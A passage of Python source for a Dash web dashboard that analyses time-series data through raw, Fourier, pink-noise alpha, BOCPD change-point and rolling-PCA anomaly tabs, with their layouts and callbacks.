DefaultFeature (str): Default search string
DefaultErrSize (float): Error scaling factor
DefaultDataType (str): "Raw", "Alpha" or "BOCPD"
DefaultRescale (float): "Norm", Plot as raw, "Rescale", plot mean centered features
Returns:
Div (html.Div): Built Tab
'''
offset = 1
sizegraph = 8
TabName = "BOCPD"
return html.Div(
children=[
Spinner("Spinner-tab4-A"),
Spinner("Spinner-tab4-B"),
Spinner("Spinner-tab4-C"),
Spinner("Spinner-tab4-D"),
#Placeholders
html.Div(
style={'display': 'none'},
children = [
html.H1(
id="RawDirect",
children='data'+os.sep+'RawData',
),
html.H1(
id="BOCPDDirect",
children='data'+os.sep+'BOCPDData',
),
html.H1(
id=TabName+'RawData',
children="0",
),
html.H1(
id=TabName+'Data',
children="0",
),
html.H1(
id=TabName+'DataSummary',
children=json.dumps(CalcStats.CalcStatsEmpty()),
),
html.H1(
id=TabName+'BOCPDDataSummary',
children=json.dumps(CalcStats.CalcBOCPDStatsEmpty())
),
],
),
dbc.Row(
children = [
#First column
dbc.Col(
children = [
dbc.Row(
build_BOCPDdatasummary(CalcStats.CalcStatsEmpty(), CalcStats.CalcBOCPDStatsEmpty()),
className="graphContainer",
),
dbc.Row(
build_Process("BOCPD"),
className="graphContainer",
),
],
width=12-sizegraph,
className = "Cols",
),
#Second column
dbc.Col(
children = [
dbc.Row(
children = [
dbc.Col(
children=[
dcc.Dropdown(
id=TabName+'ColName-dropdown',
multi=False,
placeholder="Select a variable",
style = {"overflow-y":"scroll", "height":SearchHeight},
),
],
width={"size":6, "offset": 0},
className = "Cols",
),
dbc.Col(
children=[
dcc.Input(
id=TabName+'StrSearch',
type="text",
value=DefaultFeature,
placeholder="String Search",
style={'width': "100px"},
),
],
width={"size":1, "offset": 0},
className = "Cols",
),
dbc.Col(
children=[
html.Div()
],
width={"size":3, "offset": 0},
className = "Cols",
),
dbc.Col(
children=[
dbc.Button(
id=TabName+'Run',
className="Button",
children="Run",
style={"width":"80px"},
),
],
width={"size":1, "offset": 0},
className = "Cols",
),
],
className = "Rows",
),
dbc.Row(
children = [
build_graph("BOCPDGraph", FigHeightPX/2),
],
className = "Rows",
),
dbc.Row(
children = [
build_graph("BOCPDRawGraph", FigHeightPX/2),
],
className = "Rows",
),
],
width=sizegraph,
className = "Cols",
)
], className = "Rows",
)
]
)
#######################
# Tab 5: PCA
#######################
def build_PCAdatasummary(Parameters, PCAStats):
'''
Return the key stats summary to left of figures
Parameters:
Parameters (dict): dictionary of statistics over the highlighted region about raw data
PCAStats (dict): dictionary of statistics over the highlighted region about PCA fit
Returns:
Div (html.Div): Formated left column containing data.
'''
if Parameters["Mean"] != "N/A":
t0 = Misc.unixToDatetime(Parameters["Start"])
t1 = Misc.unixToDatetime(Parameters["End"])
else:
t0 = "N/A"
t1 = "N/A"
ModalText = [
html.P(["Select the desired features using the string search or dropdown menu. A rolling PCA window has been deployed to calculate two key \
statistics. The T squared statistic, a metric of how well fitted the PCA model is to the new data point and the Q statistic a metric of how well \
understood the residuals are to the model. Both of which are good indicators of anomalies. Any values exceeding a confidence limit on the model \
will be flaged (yellow) and these contribute to the rolling rate which is plotted in the top plot. The bottom plot shows the PCA transformed \
features. A dropdown menu at the bottom will plot one of the features alone and it's marginalised rate. Key statistics \
are displayed on the left."],className="Header-text"),
]
return html.Div([
dbc.Modal(
children = [
dbc.ModalHeader("PCA info"),
dbc.ModalBody(ModalText),
dbc.ModalFooter(
dbc.Button("Close", id="PCAModal-Close", className="ModalButton")
),
],
size="lg",
scrollable=True,
id="PCAModal",
),
html.H3(["PCA anaylsis plots"],className="Header-text"),
html.P(["Highlighted region statistics;"],className="Header-text"),
html.P(["t",html.Sub("0")," = %s" % (t0)],className="Para-text"),
html.P(["t",html.Sub("1")," = %s" % (t1)],className="Para-text"),
html.P(["t",html.Sub("0"),"-t", html.Sub("1"),"=%s days" % (Parameters["Duration"])],className="Para-text"),
html.P(["PCA overview"], className="Header-text"),
html.P(["NPCA = %s" % (PCAStats["NPCA"])],className="Para-text"),
html.P(["NRisk = %s" % (PCAStats["NRegions"])],className="Para-text"),
html.P(["\u00B5(\u03BB",html.Sub(":NPCA"),") = %s" % (PCAStats["VarianceFracs"])],className="Para-text"),
html.P(["\u00B5(T",html.Sup("2"),") = %s" % (PCAStats["TsMean"])],className="Para-text"),
html.P(["\u00B5(Q) = %s" % (PCAStats["QsMean"])],className="Para-text"),
dbc.Button(
html.Span( html.Img(src="assets"+os.sep+"info.png", className="ButtonImg")),
id="PCAModal-Open", className="ButtonInfo"
),
],
id="PCATable",
)
def build_tab5(DefaultFeature, DefaultErrSize, DefaultDataType, DefaultRescale):
'''
Return the tab element of the PCA graphs tab.
Parameters:
DefaultFeature (str): Default search string
DefaultErrSize (float): Error scaling factor
DefaultDataType (str): "Raw", "Alpha" or "BOCPD"
DefaultRescale (float): "Norm", Plot as raw, "Rescale", plot mean centered features
Returns:
Div (html.Div): Built Tab
'''
offset = 1
sizegraph = 8
TabName = "PCA"
return html.Div(
children=[
Spinner("Spinner-tab5-A"),
Spinner("Spinner-tab5-B"),
Spinner("Spinner-tab5-C"),
Spinner("Spinner-tab5-D"),
#Placeholders
html.Div(
style={'display': 'none'},
children = [
html.H1(
id="RawDirect",
children='data'+os.sep+'RawData',
),
html.H1(
id=TabName+'RawData',
children="0",
),
html.H1(
id=TabName+'Data',
children="0",
),
html.H1(
id=TabName+'TsData',
children="0",
),
html.H1(
id=TabName+'QsData',
children="0",
),
html.H1(
id='DataSummary',
children=json.dumps(CalcStats.CalcStatsEmpty()),
),
html.H1(
id=TabName+'DataSummary',
children=json.dumps(CalcStats.CalcPCAStatsEmpty())
),
],
),
dbc.Row(
children = [
#First column
dbc.Col(
children = [
dbc.Row(
build_PCAdatasummary(CalcStats.CalcStatsEmpty(), CalcStats.CalcPCAStatsEmpty()),
className="graphContainer",
),
],
width=12-sizegraph,
className = "Cols",
),
#Second column
dbc.Col(
children = [
dbc.Row(
children = [
dbc.Col(
children=[
html.Div()
],
width={"size":0, "offset": 0},
className = "Cols",
),
dbc.Col(
children=[
dcc.Dropdown(
id=TabName+'ColName-dropdown',
multi=True,
placeholder="Select a variable",
style = {"overflow-y":"scroll", "height":SearchHeight},
),
],
width={"size":6, "offset": 0},
className = "Cols",
),
dbc.Col(
children=[
dcc.Input(
id=TabName+'StrSearch',
type="text",
value=DefaultFeature,
placeholder="String Search",
style={'width': "100px"},
),
],
width={"size":2, "offset": 0},
className = "Cols",
),
dbc.Col(
dcc.RadioItems(
id=TabName+'TypeSelect',
options=[
{'label': 'Raw ', 'value': 'Raw'},
{'label': 'Alpha ', 'value': 'Alpha'},
{'label': 'BOCPD ', 'value': 'BOCPD'},
],
value=DefaultDataType,
labelStyle={'display': 'inline'}
),
width={"size":2, "offset": 0},
className = "Cols",
),
dbc.Col(
children=[
dbc.Button(
id=TabName+'Run',
className="Button",
children="Run",
style={"width":"80px"},
),
],
width={"size":1, "offset": 0},
className = "Cols",
),
dbc.Col(
children=[
html.Div()
],
width={"size":1, "offset": 0},
className = "Cols",
),
],
className = "Rows",
),
dbc.Row(
children = [
build_graph("RatesGraph", int(2*FigHeightPX/3)),
],
className = "Rows",
),
dbc.Row(
children = [
build_graph("PCAGraph", int(FigHeightPX/3))
],
className = "Rows",
),
dbc.Row(
children = [
dbc.Col(
children=[
html.Div()
],
width={"size":1, "offset": 0},
className = "Cols",
),
dbc.Col(
children=[
dcc.Dropdown(
id=TabName+'TestFeature-dropdown',
multi=False,
placeholder="Select a marginal variable",
),
],
width={"size":10, "offset": 0},
className = "Cols",
),
dbc.Col(
children=[
html.Div()
],
width={"size":1, "offset": 0},
className = "Cols",
),
],className = "Rows",
),
],
width=sizegraph,
className = "Cols",
)
], className = "Rows",
)
]
)
################################################################################################################
# Bootstrap Style sheet and run.
################################################################################################################
external_stylesheets = [
{
"href": "https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css",
"rel": "stylesheet",
},
]
external_scripts=[]
app = dash.Dash(__name__, external_stylesheets=external_stylesheets, external_scripts=external_scripts)
app.title = "Dashboard Analysis"
################################################################################################################
# Layout
################################################################################################################
app.layout = html.Div(
#The main part of the code defining the application dashboard calling all the individual elements.
id="big-app-container",
className="big-app-container",
children=[
#Initial info splash screen
dbc.Modal(
children = [
dbc.ModalBody(dcc.Markdown(text_markdown)),
dbc.ModalFooter(
dbc.Button("Close", id="DashboardModal-Close", className="ModalButton")
),
],
is_open = True,
scrollable=True,
id="DashboardModal",
size="xl",
className="Modal",
),
#Banner
build_banner(),
#Refresh every second
Intervals(dt_small, "intervalSmall"),
Intervals(dt_mid, "intervalMid"),
Intervals(dt_big, "intervalBig"),
#General placeholder values
html.Div(
children = [
html.H1(
children=0,
id="JSON_Cache_Output",
),
dbc.Button(
children=0,
id="DashboardModal-Open",
),
],
style={'display': 'none'},
),
#Tab elements
html.Div(
html.Div(
id="app-container",className="app-container",
children=[
Spinner("Spinner-tabs"),
build_tabs(),
html.Div(id='tabs-content'),
],
), className="box",
),
#Runtime
html.H5(children = ["Total runtime: %02dh:%02dm:%02ds' % (0,0,0)"], id="RuntimePrint", style = { 'color':'black'}),
]
)
################################################################################################################
# Callbacks
################################################################################################################
#######################
# Modals
#######################
#Dashboard info screen
app.callback(
Output("DashboardModal", "is_open"),
[Input("DashboardModal-Open", "n_clicks"), Input("DashboardModal-Close", "n_clicks")],
[State("DashboardModal", "is_open")]
)(toggle_modal)
#Raw info screen
app.callback(
Output("RawModal", "is_open"),
[Input("RawModal-Open", "n_clicks"), Input("RawModal-Close", "n_clicks")],
[State("RawModal", "is_open")]
)(toggle_modal)
#Fourier info screen
app.callback(
Output("FourierModal", "is_open"),
[Input("FourierModal-Open", "n_clicks"), Input("FourierModal-Close", "n_clicks")],
[State("FourierModal", "is_open")]
)(toggle_modal)
#Alphas info screen
app.callback(
Output("AlphasModal", "is_open"),
[Input("AlphasModal-Open", "n_clicks"), Input("AlphasModal-Close", "n_clicks")],
[State("AlphasModal", "is_open")]
)(toggle_modal)
#BOCPD info screen
app.callback(
Output("BOCPDModal", "is_open"),
[Input("BOCPDModal-Open", "n_clicks"), Input("BOCPDModal-Close", "n_clicks")],
[State("BOCPDModal", "is_open")]
)(toggle_modal)
#PCA info screen
app.callback(
Output("PCAModal", "is_open"),
[Input("PCAModal-Open", "n_clicks"), Input("PCAModal-Close", "n_clicks")],
[State("PCAModal", "is_open")]
)(toggle_modal)
#######################
# Server time
#######################
@app.callback(Output("RuntimePrint", 'children'),
[Input('intervalSmall', 'n_intervals'),Input('intervalSmall', 'interval')])
def update_runtime(timetot, interval):
'''
Displays local server connection runtime
Parameters:
timetot (float): runtime in seconds
interval (float): interval pulse duration
Returns:
Time (str): Run time in formatted string
'''
timetot = timetot * (interval/1000)
m, s = divmod(timetot, 60)
h, m = divmod(m, 60)
return 'Total runtime: %02dh:%02dm:%02ds' % (h,m,s)
#######################
# Tabs
#######################
# Update tab selection.
@app.callback([Output('tabs-content', 'children'),Output("Spinner-tabs", "children")],
[Input('tabs', 'value')],
)
def render_tab_content(tab):
'''
Update rendered tab
Parameters:
tab (string): tab ID tab-x
Returns:
Div (html.Div): html.Div of build tab
'''
if tab == 'tab-1':
return build_tab1(DefaultFeature, DefaultErrSize, DefaultDataType, DefaultRescale), ""
elif tab == 'tab-2':
return build_tab2(DefaultFeature, DefaultErrSize, DefaultDataType, DefaultRescale), ""
elif tab == 'tab-3':
return build_tab3(DefaultFeature, DefaultErrSize, DefaultDataType, DefaultRescale), ""
elif tab == 'tab-4':
return build_tab4(DefaultFeature, DefaultErrSize, DefaultDataType, DefaultRescale), ""
elif tab == 'tab-5':
return build_tab5(DefaultFeature, DefaultErrSize, DefaultDataType, DefaultRescale), ""
################################################################################################################
# Callbacks Tab 1:
################################################################################################################
#######################
# Dropdowns
#######################
@app.callback(
[Output('RawColName-dropdown','options'),Output('RawColName-dropdown','value')],
[Input('RawStrSearch', "value")],
[State('RawDirect','children')],
)
def update_dropdowns(StrSearch, RawDir):
'''
Update options for dropdown element for variables in Raw graphs
Parameters:
StrSearch (float): Key substring to index files by
RawDir (float): Files directory
Returns:
Dropdowns (options): List of possible dropdowns
Value (value): Initial selected value
'''
Files = DatM.GlobDirectory(RawDir)
KeySelected = Misc.PatternsList(StrSearch, Files)
if len(KeySelected) > 0:
Value = KeySelected
else:
KeySelected = Files
Value = None
global DefaultFeature
DefaultFeature = StrSearch
return [{'label':"Variable: %s" % (name), 'value':name} for name in KeySelected], Value
#######################
# Sliders
#######################
app.callback(
[Output('RawRangeSlider','min'),Output('RawRangeSlider','max'),Output('RawRangeSlider','value'),Output('RawRangeSlider','marks')],
[Input('RawData','children')]
)(DateSlider)
#######################
# Load Data
#######################
@app.callback(
[Output('RawData', 'children'),Output('RawDataError', 'children')],
[Input('RawDirect','children'), Input('RawColName-dropdown', 'value')],
)
def update_data(RawDir, Features):
'''
Update raw graph data
Parameters:
RawDir (float): Files directory
Features (list): List of features to be loaded
Returns:
data (json): Jsonified data
error (json): Jsonified errors
'''
if Features not in [None, "None"]:
if len(Features) > 6:
return 0,0
data, err = DatM.PCALOAD(RawDir, Features)
if data.empty: #Checks to make sure senible to plot
return 0,0
return data.to_json(date_format='iso', orient='split'), err.to_json(date_format='iso', orient='split')
else:
return 0,0
#######################
# Raw Plots
#######################
@app.callback(
[Output('RawGraph', 'figure'),Output("RawDataSummary","children")],
[Input('RawData','children'), Input('RawDataError', 'children'), Input('RawRangeSlider','value'), Input("RawSigNum","value"), Input("RawNormed","value")]
)
def update_graph(jsonified_data,jsonified_err,value, sig, Norm):
'''
Update raw graph selected
Parameters:
jsonified_data (json): Jsonified data
jsonified_error (json): Jsonified errors
value ([float,float]): Slider positions
sig (float): Error scaling factor
Norm (str): "Norm" or "Rescaled". If to mean center plots
Returns:
Fig (dcc.Graph) : Figure element
JSON (json) : jsonified summary data for display
'''
global DefaultRescale
DefaultRescale = Norm
if jsonified_data not in [0,"0", None, "None"]:
startval = Misc.unixToDatetime(value[0])
endval = Misc.unixToDatetime(value[1]+1)
#Un json data
data = pd.read_json(jsonified_data, orient='split')
err = pd.read_json(jsonified_err, orient='split')
#Remove Timezone info that read_json puts in
data.index = data.index.tz_localize(None)
err.index = data.index.tz_localize(None)
Data_i_Name = data.columns[0]
# Statistics of interest
WindowParameters = CalcStats.CalcStats(data[startval:endval])
if Norm == "None":
Fig = DashPlots.CreateRawFigStacked(data, err, sig, data.columns, WindowParameters, FigHeightPX)
if Norm == "Rescaled":
Fig = DashPlots.CreateRawFigStacked(data.transform(lambda x: x-x.mean()), err, sig, data.columns, WindowParameters, FigHeightPX)
if SaveFigs == 1:
XRange = [data.index[0],data.index[-1]]
YRange = [None,None]
NameDate = "_%s_%s" % (XRange[0].strftime("%d%m%Y"),XRange[1].strftime("%d%m%Y"))
p1 = Process(target=Graphing.plotMATPLOTLIB, args=[[data.index],[data[Data_i_Name].values], [None],XRange,YRange,"linear", "linear", [], [], "Time, t", Data_i_Name, [""], ["black"],["-"],"cachefiles"+os.sep+"Raw",Data_i_Name+NameDate,True])
p1.start()
p1.join()
return Fig, json.dumps(WindowParameters)
else:
return DashPlots.EmptyFig(FigHeightPX), json.dumps(CalcStats.CalcStatsEmpty())
#######################
# Summary Stats
#######################
@app.callback(
Output('RawTable', 'children'),
[Input("RawDataSummary","children")]
)
def update_Summary(Parameters):
'''
Load paramters into summary column
Parameters:
Parameters (json): Parameters summarising Raw data
Returns:
Dict (dict): Parameters summarising Raw data
'''
Parameters = json.loads(Parameters)
return build_rawdatasummary(Parameters)
################################################################################################################
# Callbacks Tab 2:
################################################################################################################
#######################
# Dropdowns
#######################
@app.callback(
[Output('FourierColName-dropdown','options'),Output('FourierColName-dropdown','value')],
[Input('FourierStrSearch', "value")],
[State('RawDirect','children')],
)
def update_dropdowns(StrSearch, RawDir):
'''
Update options for dropdown element for variables in Raw graphs
Parameters:
StrSearch (float): Key substring to index files by
RawDir (float): Files directory
Returns:
Dropdowns (options): List of possible dropdowns
Value (value): Initial selected value
'''
Files = DatM.GlobDirectory(RawDir)
KeySelected = Misc.PatternsList(StrSearch, Files)
if len(KeySelected) > 0:
Value = KeySelected[0]
else:
KeySelected = Files
Value = None
global DefaultFeature
DefaultFeature = StrSearch
return [{'label':"Variable: %s" % (name), 'value':name} for name in KeySelected], Value
#######################
# Sliders
#######################
app.callback( [Output('FourierRangeSlider','min'),Output('FourierRangeSlider','max'),Output('FourierRangeSlider','value'),Output('FourierRangeSlider','marks')],
[Input('FourierData','children')]
)(DateSlider)
#######################
# Update data
#######################
app.callback(
Output('FourierData', 'children'),
[Input('RawDirect','children'), Input('FourierColName-dropdown', 'value')]
)(LoadDataAfterDropdowns)
#######################
# Raw Plots
#######################
@app.callback(
[Output('FourierRawGraph', 'figure'),Output("FourierDataSummary","children")],
[Input('FourierData','children'), Input('FourierRangeSlider','value'),Input("FourierSigNum", "value")],
)
def update_graph(jsonified_data, value, sig):
'''
Update Fourier Raw graph
Parameters:
jsonified_data (json): Jsonified data
value ([float,float]): Slider positions
sig (float): Error scaling factor
Returns:
Fig (dcc.Graph) : Figure element
JSON (json) : jsonified summary data for display
'''
if jsonified_data not in [0,"0", None, "None"]:
startval = Misc.unixToDatetime(value[0])
endval = Misc.unixToDatetime(value[1])
#Un json data
data = pd.read_json(jsonified_data, orient='split')
#Remove Timezone info that read_json puts in
data.index = data.index.tz_localize(None)
Data_i_Name = data.columns[0]
# Statistics of interest
WindowParameters = CalcStats.CalcStats(data[startval:endval][Data_i_Name])
FigRaw = DashPlots.CreateRawFig(data, sig, Data_i_Name, WindowParameters, FigHeightPX/2)
return FigRaw, json.dumps(WindowParameters)
else:
return DashPlots.EmptyFig(FigHeightPX/2), json.dumps(CalcStats.CalcStatsEmpty())
@app.callback(
[Output('FourierGraph', 'figure'),Output("FourierFourierDataSummary","children")],
[Input('FourierData','children'), Input('FourierRangeSlider','value'), Input("FourierLinLog","value")],
[State("FourierSigNum", "value")]
)
def update_graph(jsonified_data, value, LinLog, sig):
'''
Update Fourier graph
Parameters:
jsonified_data (json): Jsonified data
value ([float,float]): Slider positions
LinLog (str): "Linear" or "Log" scaling on power spectrum
sig (float): Error scaling factor
Returns:
Fig (dcc.Graph) : Figure element
JSON (json) : jsonified summary data for display
'''
if jsonified_data not in [0,"0", None, "None"]:
startval = Misc.unixToDatetime(value[0])
endval = Misc.unixToDatetime(value[1])
#Un json data
data = pd.read_json(jsonified_data, orient='split')
#Remove Timezone info that read_json puts in
data.index = data.index.tz_localize(None)
Data_i_Name = data.columns[0]
# Statistics of interest
WindowParameters = CalcStats.CalcStats(data[startval:endval][Data_i_Name])
units = Misc.CalcUnits(WindowParameters["Rate"],WindowParameters["RateUnit"])
if units == None:
return DashPlots.EmptyFig(FigHeightPX/2), json.dumps(CalcStats.CalcFourierStatsEmpty())
fftfreq, AmpSpec, _ = Fourier.FourierTransform(data[Data_i_Name].values, units)
if LinLog == 'Log':
MinValue = min(AmpSpec[fftfreq > 0])/10
MaxValue = max(AmpSpec[fftfreq > 0])*10
if LinLog == 'Linear':
MaxValue = max(AmpSpec[fftfreq > 0])*2
MinValue = 0
fftfreq, AmpSpec, Series_phase = Fourier.FourierTransform(data[startval:endval][Data_i_Name].values, units)
#Error estimated on mean devition beween points
errs = Misc.errCalculation(data, WindowParameters["RateUnit"], True)
PPink, PPinkErrs = Fourier.FitPink(fftfreq[fftfreq > Alpha_MinFreq], AmpSpec[fftfreq > Alpha_MinFreq], errs, units)
FigAlpha = DashPlots.CreateFFTFig(fftfreq[fftfreq > 0], AmpSpec[fftfreq > 0],PPink, FigHeightPX/2,[MinValue, MaxValue], Alpha_MinFreq, LinLog, Data_i_Name)
FourierStats = CalcStats.CalcFourierStats(fftfreq[fftfreq > 0], AmpSpec[fftfreq > 0],PPink, PPinkErrs)
if SaveFigs == 1:
NameDate = "_%s_%s" % (data.index[0].strftime("%d%m%Y"),data.index[-1].strftime("%d%m%Y"))
LinesVert=[365,365*2,365*3,365*4,365*5,365*6,365*7,365*8,365*9,365*10,365*11,365*12]
if LinLog == "Linear":
YScale = 'linear'
if LinLog == "Log":
YScale = 'log'
XRange = [fftfreq[fftfreq > 0][0]/2, fftfreq[fftfreq > 0][-1]*2]
XModel = np.logspace(np.log10(XRange[0]), np.log10(XRange[1]), 1000)
YModel = Fourier.modelPink(XModel, PPink[0], PPink[1])
YRange = [min(min(YModel),min(AmpSpec[fftfreq > 0])), max(max(YModel),max(AmpSpec[fftfreq > 0]))]
p1 = Process(target=Graphing.plotMATPLOTLIB, args=[[fftfreq[fftfreq > Alpha_MinFreq],XModel],[AmpSpec[fftfreq > Alpha_MinFreq],YModel], [None,None],XRange,YRange,"log", YScale,LinesVert, [], "frequency, f [1/year]", "Amplitude, A", ["Data","Model"], ["black", "red"],["-", "--"],"cachefiles"+os.sep+"Fourier",Data_i_Name+NameDate,False])
p1.start()
p1.join()
return FigAlpha, json.dumps(FourierStats)
else:
return DashPlots.EmptyFig(FigHeightPX/2), json.dumps(CalcStats.CalcFourierStatsEmpty())
#######################
# Summary Stats
#######################
@app.callback(
Output('FourierTable', 'children'),
[Input("FourierDataSummary","children"),Input("FourierFourierDataSummary","children")]
)
def update_graph(Parameters, FourierStats):
'''
Load paramters into summary column
Parameters:
Parameters (json): Parameters summarising Raw data
FourierStats (json): Parameters summarising Fourier data
Returns:
Dict (dict): Parameters summarising Raw data
'''
Parameters = json.loads(Parameters)
FourierStats = json.loads(FourierStats)
return build_fourierdatasummary(Parameters, FourierStats)
################################################################################################################
# Callbacks Tab 3:
################################################################################################################
#######################
# Dropdowns
#######################
@app.callback(
[Output('AlphasColName-dropdown','options'),Output('AlphasColName-dropdown','value')],
[Input('AlphasStrSearch', "value")],
[State('RawDirect','children')],
)
def update_dropdowns(StrSearch, RawDir):
'''
Update options for dropdown element for variables in Raw graphs
Parameters:
StrSearch (float): Key substring to index files by
RawDir (float): Files directory
Returns:
Dropdowns (options): List of possible dropdowns
Value (value): Initial selected value
'''
global DefaultFeature
DefaultFeature = StrSearch
Files = DatM.GlobDirectory(RawDir)
KeySelected = Misc.PatternsList(StrSearch, Files)
if len(KeySelected) > 0:
Value = KeySelected[0]
else:
KeySelected = Files
Value = None
return [{'label':"Variable: %s" % (name), 'value':name} for name in KeySelected], Value
#######################
# Load data
#######################
app.callback(
Output('AlphasRawData', 'children'),
[Input('RawDirect','children'), Input('AlphasColName-dropdown', 'value')]
)(LoadDataAfterDropdowns)
@app.callback(
[Output('AlphasData', 'children'),Output("Spinner-tab3-B","children")],
[Input('AlphasRun','n_clicks')],
[State('AlphasRawData','children'), State('RawDirect','children'), State('AlphasDirect','children')])
def LoadAlphasData(n_clicks,jsonified_data, RawDir, AlphaDir):
'''
Generate Alpha data
Parameters:
n_clicks (int): A decimal integer
jsonified_data (json): Jsonified data
RawDir (float): Files directory
AlphaDir (float): Files directory
Returns:
AlphaData (json): Jsonified data of alphas
spinner (dcc.spinner): spinner object
'''
if jsonified_data not in [0,"0", None, "None"] and n_clicks not in [None]:
#Un json data
data = pd.read_json(jsonified_data, orient='split')
#Remove Timezone info that read_json puts in
data.index = data.index.tz_localize(None)
Data_i_Name = data.columns[0]
# Statistics of interest
WindowParameters = CalcStats.CalcStats(data[Data_i_Name])
units = Misc.CalcUnits(WindowParameters["Rate"],WindowParameters["RateUnit"])
window = Misc.WindowSize(WindowParameters["Rate"], WindowParameters["RateUnit"], WindowUnit, WindowN)
FileExists = DatM.CheckExists(RawDir, AlphaDir, Data_i_Name)
if FileExists == True:
Alphasdf = DatM.LoadData(AlphaDir, Data_i_Name)
else:
#Error estimated on mean devition beween points
errs = Misc.errCalculation(data, WindowParameters["RateUnit"], True)
Alphasdf = Fourier.AlphasProgress(data[Data_i_Name].values, window, errs, units, Data_i_Name)
Alphasdf.index = data.index
writer = pd.ExcelWriter("%s%s%s.xlsx" % (AlphaDir, os.sep, Data_i_Name), mode="w")
Alphasdf.to_excel(writer)
writer.save()
return Alphasdf.to_json(date_format='iso', orient='split'), ""
else:
return "0", ""
#######################
# RPlots
#######################
@app.callback(
[Output('AlphasRawGraph', 'figure'),Output("AlphasDataSummary","children"),Output("AlphasProcess-Header", "children")],
[Input('AlphasRawData','children'), Input('AlphasGraph', 'clickData'), Input("AlphasSigNum", "value")]
)
def update_graph(jsonified_data, clickData, sig):
'''
Update Alpha Raw graph
Parameters:
jsonified_data (json): Jsonified data
clickData (dict): Click Data
sig (float): Error scaling factor
Returns:
Fig (dcc.Graph) : Figure element
JSON (json) : jsonified summary data for display
Header (str): Header above progress bar
'''
if jsonified_data not in [0,"0", None, "None"]:
#Un json data
data = pd.read_json(jsonified_data, orient='split')
#Remove Timezone info that read_json puts in
data.index = data.index.tz_localize(None)
Data_i_Name = data.columns[0]
WindowParameters = CalcStats.CalcStats(data[Data_i_Name])
f = Misc.timedeltaOneUnit(WindowN, WindowUnit)
if clickData == None:
endval = data.index[-1]
startval = endval - f
elif clickData["points"][0]["pointIndex"] > len(data.index):
endval = data.index[-1]
startval = endval - f
else:
endval = Misc.getDateTimeFromString(clickData["points"][0]["x"])
startval = endval - f
if endval > data.index[-1] or startval < data.index[0]:
#CatchRefresh errors
endval = data.index[-1]
startval = endval - f
# Statistics of interest
WindowParameters = CalcStats.CalcStats(data[startval:endval][Data_i_Name])
FigRaw = DashPlots.CreateRawFig(data, sig, Data_i_Name, WindowParameters, FigHeightPX/2)
return FigRaw, json.dumps(WindowParameters), "Run all:"
else:
return DashPlots.EmptyFig(FigHeightPX/2), json.dumps(CalcStats.CalcStatsEmpty()), "Run all:"
@app.callback(
[Output('AlphasGraph', 'figure'),Output("AlphasAlphasDataSummary","children")],
[Input('AlphasData','children')],
[State('AlphasRawData','children'), State('AlphasDirect','children'), State("AlphasSigNum","value")],
)
def update_graph(jsonified_dataAlphas, jsonified_data, AlphaDir, sig):
'''
Update Alpha Raw graph
Parameters:
jsonified_dataAlphas (json): Jsonified Alpha data
jsonified_data (json): Jsonified data
AlphaDir (str): Alpha data directory
sig (float): Error scaling factor
Returns:
Fig (dcc.Graph) : Figure element
JSON (json) : jsonified summary data for display
'''
if jsonified_data not in [0,"0", None, "None"] and jsonified_dataAlphas not in [0,"0", None, "None"]:
#Un json data
data = pd.read_json(jsonified_data, orient='split')
data.index = data.index.tz_localize(None)
Data_i_Name = data.columns[0]
# Statistics of interest
WindowParameters = CalcStats.CalcStats(data[Data_i_Name])
Alphasdf = pd.read_json(jsonified_dataAlphas, orient='split')
Alphasdf.index = Alphasdf.index.tz_localize(None)
Fig = DashPlots.CreateAlphasFig(Alphasdf, WindowParameters, sig, FigHeightPX/2, Data_i_Name)
if SaveFigs == 1:
XRange = [data.index[0],data.index[-1]]
NameDate = "_%s_%s" % (XRange[0].strftime("%d%m%Y"),XRange[1].strftime("%d%m%Y"))
p1 = Process(target=Graphing.plotMATPLOTLIBAlpha, args=[data,Alphasdf,XRange,[None,None],"cachefiles"+os.sep+"Alpha",Data_i_Name+NameDate,True])
p1.start()
p1.join()
return Fig, json.dumps(CalcStats.CalcAlphaStats(Alphasdf[Data_i_Name]))
else:
return DashPlots.EmptyFig(FigHeightPX/2), json.dumps(CalcStats.CalcAlphaStatsEmpty())
#######################
# Run all alphas
#######################
@app.callback(
[Output("AlphasProcess-Button","children"),Output("Spinner-tab3-A", "children")],
[Input('AlphasProcess-Button','n_clicks')],
[State('AlphasProcess-Button','children') ,State('RawDirect','children'),State('AlphasDirect','children')],
)
def update_graph(NClicks,ButtonState, RawDir, AlphaDir):
'''
Run all alpha anaylsis
Parameters:
NClicks (dict): Clickdata
ButtonState (str): Button text
RawDir (str): Raw data directory
AlphaDir (str): Alpha data directory
Returns:
ButtonStr (str) : Button text
Spinner (dcc.spinner) : spinner object to display while loading
'''
if NClicks not in [0, "0", None, "None"]:
Files = DatM.GlobDirectory(RawDir)
for Data_i_Name in Files:
print(Data_i_Name)
AlphaFileExists = DatM.CheckExists(RawDir, AlphaDir, Data_i_Name)
if AlphaFileExists == True:
continue
else:
data = DatM.LoadData(RawDir, Data_i_Name)
# Statistics of interest
WindowParameters = CalcStats.CalcStats(data[Data_i_Name])
units = Misc.CalcUnits(WindowParameters["Rate"],WindowParameters["RateUnit"])
window = Misc.WindowSize(WindowParameters["Rate"], WindowParameters["RateUnit"], WindowUnit, WindowN)
#Error estimated on mean devition beween points
errs = Misc.errCalculation(data, WindowParameters["RateUnit"], True)
Alphasdf = Fourier.AlphasProgress(data[Data_i_Name].values, window, errs, units, Data_i_Name)
Alphasdf.index = data.index
writer = pd.ExcelWriter("%s%s%s.xlsx" % (AlphaDir, os.sep, Data_i_Name), mode="w")
Alphasdf.to_excel(writer)
writer.save()
return "Done", ""
else:
return ButtonState, ""
#######################
# Summary stats
#######################
@app.callback(
Output('AlphasTable', 'children'),
[Input("AlphasDataSummary","children"),Input("AlphasAlphasDataSummary","children")]
)
def update_graph(Parameters, AlphaStats):
'''
Load paramters into summary column
Parameters:
Parameters (json): Parameters summarising Raw data
AlphaStats (json): Parameters summarising Alpha data
Returns:
Dict (dict): Parameters summarising Raw data
'''
Parameters = json.loads(Parameters)
AlphaStats = json.loads(AlphaStats)
return build_Alphasdatasummary(Parameters, AlphaStats)
#######################
# Progress
#######################
@app.callback(
[Output("AlphasProcess-Progress","children"), Output("AlphasProcess-Progress","value")],
[Input("intervalMid","n_intervals")],
[State('RawDirect','children'), State('AlphasDirect','children')]
)
def update_graph(n_intervals, RawDir, AlphaDir):
'''
Progess bar updater
Parameters:
n_interval (): Interval pulse
RawDir (str): Raw data directory
AlphaDir (str): Alpha data directory
Returns:
Percent (str): Percentage compleation
value (float): Percentage compleation
'''
